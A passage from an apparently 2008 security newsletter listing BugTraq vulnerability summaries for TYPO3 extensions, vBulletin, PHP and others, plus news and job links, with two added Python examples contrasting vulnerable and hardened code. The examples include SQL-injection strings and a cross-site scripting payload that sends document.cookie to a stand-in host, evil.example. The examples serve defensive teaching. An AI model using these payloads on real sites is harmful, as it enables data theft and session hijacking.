An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.

85. CaupoShop 'csc_article_details.php' SQL Injection Vulnerability
BugTraq ID: 29834
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29834
Summary:
CaupoShop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

CaupoShop Classic 1.3 is vulnerable; other versions may also be affected.

86. TYPO3 nepa-design.de Spam Protection Extension Unspecified Setting Manipulation Vulnerability
BugTraq ID: 29833
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29833
Summary:
TYPO3 nepa-design.de Spam Protection extension is prone to a vulnerability that results in the manipulation of external settings.

Attackers can leverage the issue to make unauthorized changes that may aid in further attacks.

nepa-design.de Spam Protection 0.1.3 is vulnerable; prior versions may also be affected.

87. TYPO3 Resource Library Extension Unspecified Cross-Site Scripting Vulnerability
BugTraq ID: 29832
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29832
Summary:
The Resource Library extension for TYPO3 is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Resource Library 0.10 is vulnerable; prior versions may also be affected.

88. MindTouch DekiWiki Search Cross-Site Scripting Vulnerability
BugTraq ID: 29830
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29830
Summary:
DekiWiki is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Versions prior to 8.05.1 are vulnerable.

89. PHP 'rfc822_write_address()' Function Buffer Overflow Vulnerability
BugTraq ID: 29829
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29829
Summary:
PHP is prone to a buffer-overflow vulnerability because the application fails to perform boundary checks before copying user-supplied data to insufficiently sized memory buffers.

An attacker can exploit this issue to execute arbitrary machine code in the context of the affected webserver. Failed exploit attempts will likely crash the webserver, denying service to legitimate users.

PHP versions 5.2.6 and prior are vulnerable.

90. TYPO3 JobControl Extension Unspecified Cross-Site Scripting Vulnerability
BugTraq ID: 29828
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29828
Summary:
The JobControl extension for TYPO3 is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

JobControl versions prior to 1.15.1 are vulnerable.

91. TYPO3 Random Prayer Extension SQL Injection Vulnerability
BugTraq ID: 29827
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29827
Summary:
TYPO3 Random Prayer extension is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

TYPO3 Random Prayer 0.0.1 is vulnerable.

92. TYPO3 TARGET-E WorldCup Bets Extension Multiple Unspecified Input Validation Vulnerabilities
BugTraq ID: 29826
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29826
Summary:
The TARGET-E WorldCup Bets extension for TYPO3 is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

TARGET-E WorldCup Bets extension 2.0.0 is vulnerable; other versions may also be affected.

93. TYPO3 Download system Extension SQL Injection Vulnerability
BugTraq ID: 29825
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29825
Summary:
TYPO3 Download system extension is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

TYPO3 Download system 0.1.4 is vulnerable; prior versions may also be affected.

94. TYPO3 Fussballtippspiel Extension SQL Injection Vulnerability
BugTraq ID: 29824
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29824
Summary:
TYPO3 Fussballtippspiel extension is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

TYPO3 Fussballtippspiel 0.1.1 and prior are vulnerable.

95. TYPO3 TIMTAB Social Bookmark Icons Extension SQL Injection Vulnerability
BugTraq ID: 29823
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29823
Summary:
TYPO3 TIMTAB - social bookmark icons extension is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

TYPO3 TIMTAB - social bookmark icons 2.0.4 and prior are vulnerable.

96. TYPO3 Diocese of Portsmouth Training Courses Extension SQL Injection Vulnerability
BugTraq ID: 29822
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29822
Summary:
TYPO3 Diocese of Portsmouth Training Courses extension is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

TYPO3 Diocese of Portsmouth Training Courses 0.1.1 is vulnerable; other versions may also be affected.

97. TYPO3 CoolURI Extension SQL Injection Vulnerability
BugTraq ID: 29821
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29821
Summary:
TYPO3 CoolURI extension is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

TYPO3 CoolURI 1.0.11 and prior are vulnerable.

98. TYPO3 Diocese of Portsmouth Calendar Today Extension SQL Injection Vulnerability
BugTraq ID: 29819
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29819
Summary:
TYPO3 Diocese of Portsmouth Calendar Today extension is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

TYPO3 Diocese of Portsmouth Calendar Today 0.0.3 and prior are vulnerable.
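
The SQL-injection entries above (91 and 93 through 98) all describe the same flaw: a request parameter is pasted into SQL text instead of being bound as a parameter. The block below is an added example written for this newsletter, not code from any TYPO3 extension or from the newsletter itself; the table name, columns, sample rows and the two attacker values are constructed for illustration. It runs the flawed query and the parameterized query side by side against an in-memory SQLite database so the difference in outcome is visible.

```python
import sqlite3

# Constructed sample data standing in for the records a download, bet or
# calendar plugin would list. Names, columns and rows are assumptions.
SAMPLE_ROWS = [
    ("public-manual.pdf", "docs", 0),
    ("internal-roadmap.pdf", "docs", 1),   # hidden: must never be listed
    ("intro.mp4", "media", 0),
]


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database seeded with SAMPLE_ROWS."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE downloads (title TEXT, category TEXT, hidden INTEGER)")
    conn.executemany("INSERT INTO downloads VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def list_titles_vulnerable(conn: sqlite3.Connection, category: str) -> list:
    """The pattern the advisories describe: the parameter is interpolated
    straight into the SQL text, so a quote in it changes the query's structure."""
    sql = "SELECT title FROM downloads WHERE hidden = 0 AND category = '%s'" % category
    return [row[0] for row in conn.execute(sql)]


def list_titles_parameterized(conn: sqlite3.Connection, category: str) -> list:
    """Hardened: the value is bound as a parameter. The driver never lets it
    become part of the SQL grammar, so quotes and comment markers are data."""
    sql = "SELECT title FROM downloads WHERE hidden = 0 AND category = ?"
    return [row[0] for row in conn.execute(sql, (category,))]


# Two constructed attacker values: the first rewrites the WHERE clause so the
# hidden filter no longer applies, the second appends a UNION that pulls the
# rows the query was meant to exclude and comments out the trailing quote.
TAUTOLOGY = "' OR '1'='1"
UNION_PULL = "' UNION SELECT title FROM downloads WHERE hidden = 1 --"


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("vulnerable", list_titles_vulnerable),
                     ("parameterized", list_titles_parameterized)):
        for value in ("docs", TAUTOLOGY, UNION_PULL):
            print(f"{name:13s} {value!r:62s} -> {fn(db, value)}")
```

With the legitimate value "docs" both functions return the one visible document. With either attacker value the interpolating version returns rows the query was meant to hide (all three rows for the tautology, the hidden title for the UNION), while the parameterized version returns nothing because no category literally equals the attacker string. Escaping quotes by hand is the weaker fix; binding parameters removes the whole class.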

99. OwnRS 'clanek.php' Multiple Input Validation Vulnerabilities
BugTraq ID: 29818
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29818
Summary:
OwnRS CMS is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

OwnRS beta 3 is vulnerable; other versions may also be affected.

100. vBulletin Moderation Control Panel 'redirect' Parameter Cross-Site Scripting Vulnerability
BugTraq ID: 29817
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29817
Summary:
vBulletin is prone to a cross-site scripting vulnerability that occurs in the MCP (moderation control panel) because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

vBulletin 3.7.1 PL1 and 3.6.10 PL1 are vulnerable; prior versions may also be affected.
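
The cross-site scripting entries above (87, 88, 90 and 100) share one mechanism: a request parameter is echoed into the page without output encoding, so a value carrying markup runs as script in the victim's browser and can read the session cookie. The block below is an added example written for this newsletter, not code from vBulletin or any of the other products listed; the page fragment, the redirect-target check and the attacker value are constructed. It shows the raw echo beside the encoded one and, because entry 100 concerns a 'redirect' parameter, adds the destination check a practitioner would want on such a parameter, which is an assumption about good practice rather than something the advisory states.

```python
import html
from urllib.parse import urlsplit

# Constructed attacker value for a reflected parameter: it closes the
# attribute it lands in and injects a script that ships document.cookie
# off-site, the cookie-theft outcome the advisories describe.
PAYLOAD = "\"><script>document.location='http://evil.example/?c='+document.cookie</script>"


def render_vulnerable(redirect: str) -> str:
    """The flawed pattern: the parameter is echoed into HTML unchanged."""
    return '<p>Redirecting to <a href="%s">%s</a></p>' % (redirect, redirect)


def escape_for_html(value: str) -> str:
    """Output encoding for HTML text and attribute values: &, <, >, " and '
    become entities, so the browser treats the value as data, not markup."""
    return html.escape(value, quote=True)


def safe_redirect_target(redirect: str, fallback: str = "/") -> str:
    """Added check for a redirect parameter (an assumption, not from the
    advisory): accept only a local absolute path. A scheme, a host, or a
    protocol-relative '//' or '/\\' prefix falls back to the site root,
    which also closes the open-redirect hole such parameters usually carry."""
    parts = urlsplit(redirect)
    if parts.scheme or parts.netloc or not parts.path.startswith("/"):
        return fallback
    if redirect.startswith(("//", "/\\")):   # browsers treat '/\' as '//'
        return fallback
    return redirect


def render_hardened(redirect: str) -> str:
    """Validate the destination first, then encode it for the HTML context."""
    safe = escape_for_html(safe_redirect_target(redirect))
    return '<p>Redirecting to <a href="%s">%s</a></p>' % (safe, safe)


if __name__ == "__main__":
    for value in ("/forum/thread?id=5", "//evil.example/", PAYLOAD):
        print("vulnerable:", render_vulnerable(value))
        print("hardened:  ", render_hardened(value))
```

The encoding step alone is what closes the cross-site scripting issue; the destination check is defence in depth for this particular parameter. Marking the session cookie HttpOnly is a further, independent mitigation: script that does run can no longer read it through document.cookie, though it can still act on the user's behalf within the page.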

III. SECURITYFOCUS NEWS ARTICLES
--------------------------------
1. Ransomware resisting crypto cracking efforts
By: Robert Lemos
Kaspersky calls for a massive effort to break the code keys used by a malicious program that encrypts its victim's data and asks for ransom, but other experts doubt the keys can be found or that finding them will help.
http://www.securityfocus.com/news/11523

2. Boycott spotlights antivirus testing issues
By: Robert Lemos
Security firm Trend Micro refuses to apply for future VB100 certifications, highlighting a debate over how to best test antivirus software.
http://www.securityfocus.com/news/11522

3. Hired gun blamed for business outage
By: Robert Lemos
Video-content firm Revision3 accuses anti-piracy company MediaDefender -- known for its aggressive tactics against file sharers -- of attacking its servers over the weekend.
http://www.securityfocus.com/news/11521

4. Legal experts wary of MySpace hacking charges
By: Robert Lemos
Federal prosecutors charge the parent who allegedly badgered a girl to suicide with three counts of computer crime, but law experts worry about a dangerous precedent.
http://www.securityfocus.com/news/11519

IV. SECURITY JOBS LIST SUMMARY
-------------------------------
1. [SJ-JOB] Director, Computer Security, Fort Lauderdale
http://www.securityfocus.com/archive/77/493408

2. [SJ-JOB] Certification & Accreditation Engineer, Laurel
http://www.securityfocus.com/archive/77/493413

3. [SJ-JOB] Sr. Security Analyst, Washington
http://www.securityfocus.com/archive/77/493414

4. [SJ-JOB] Sr. Security Engineer, Jersey City
http://www.securityfocus.com/archive/77/493415

5. [SJ-JOB] Sr. Security Engineer, San Jose
http://www.securityfocus.com/archive/77/493416

6. [SJ-JOB] Security Consultant, Columbus/Cincinnati/Indianapolis
http://www.securityfocus.com/archive/77/493411

7. [SJ-JOB] Sales Engineer, Bangalore, New Delhi and Hyderabad
http://www.securityfocus.com/archive/77/493417

8. [SJ-JOB] Security Architect, Chicago
http://www.securityfocus.com/archive/77/493418

9. [SJ-JOB] Security Engineer, Herndon
http://www.securityfocus.com/archive/77/493419

10. [SJ-JOB] Security System Administrator, Washington
http://www.securityfocus.com/archive/77/493420

11. [SJ-JOB] Penetration Engineer, San Francisco
http://www.securityfocus.com/archive/77/493402

12. [SJ-JOB] Developer, Ciudad de Buenos Aires - Palermo
http://www.securityfocus.com/archive/77/493406

13. [SJ-JOB] Application Security Engineer, Chicago
http://www.securityfocus.com/archive/77/493410

14. [SJ-JOB] Sr. Product Manager, Boston
http://www.securityfocus.com/archive/77/493401

15. [SJ-JOB] Security Consultant, Atlanta
http://www.securityfocus.com/archive/77/493404

16. [SJ-JOB] Security Engineer, Atlanta
http://www.securityfocus.com/archive/77/493407

17. [SJ-JOB] Developer, Arlington
http://www.securityfocus.com/archive/77/493409

18. [SJ-JOB] Technical Writer, Alpharetta
http://www.securityfocus.com/archive/77/493412

19. [SJ-JOB] Developer, Ciudad de Buenos Aires - Palermo
http://www.securityfocus.com/archive/77/493398

20. [SJ-JOB] Security Consultant, Atlanta
http://www.securityfocus.com/archive/77/493399

21. [SJ-JOB] Sr. Product Manager, Atlanta
http://www.securityfocus.com/archive/77/493400

22. [SJ-JOB] Sales Engineer, St. Paul
http://www.securityfocus.com/archive/77/493403

23. [SJ-JOB] Sr. Product Manager, San Jose
http://www.securityfocus.com/archive/77/493396

24. [SJ-JOB] Sr. Product Manager, Washington
http://www.securityfocus.com/archive/77/493397

V. INCIDENTS LIST SUMMARY
---------------------------
VI. VULN-DEV RESEARCH LIST SUMMARY
-----------------------------------
VII. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. default for requiring authentication 2003
http://www.securityfocus.com/archive/88/493298

VIII. SUN FOCUS LIST SUMMARY
----------------------------
IX. LINUX FOCUS LIST SUMMARY
----------------------------
1. Vulnerability and Patch-Management in Linux (and other Unix)
http://www.securityfocus.com/archive/91/493478

X. UNSUBSCRIBE INSTRUCTIONS
-----------------------------
To unsubscribe, send an e-mail message to sf-news-unsubscribe@securityfocus.com from the subscribed address. The contents of the subject and message body do not matter. You will receive a confirmation request message to which you must reply. Alternatively, visit http://www.securityfocus.com/newsletters and unsubscribe via the website.

If your email address has changed email listadmin@securityfocus.com and ask to be manually removed.

XI. SPONSOR INFORMATION
------------------------
This issue is sponsored by Black Hat USA:

Attend Black Hat USA, August 2-7 in Las Vegas, the world's premier technical event for ICT security experts. Featuring 40 hands-on training courses and 80 Briefings presentations with lots of new content and new tools. Network with 4,000 delegates from 50 nations. Visit product displays by 30 top sponsors in a relaxed setting.

www.blackhat.com
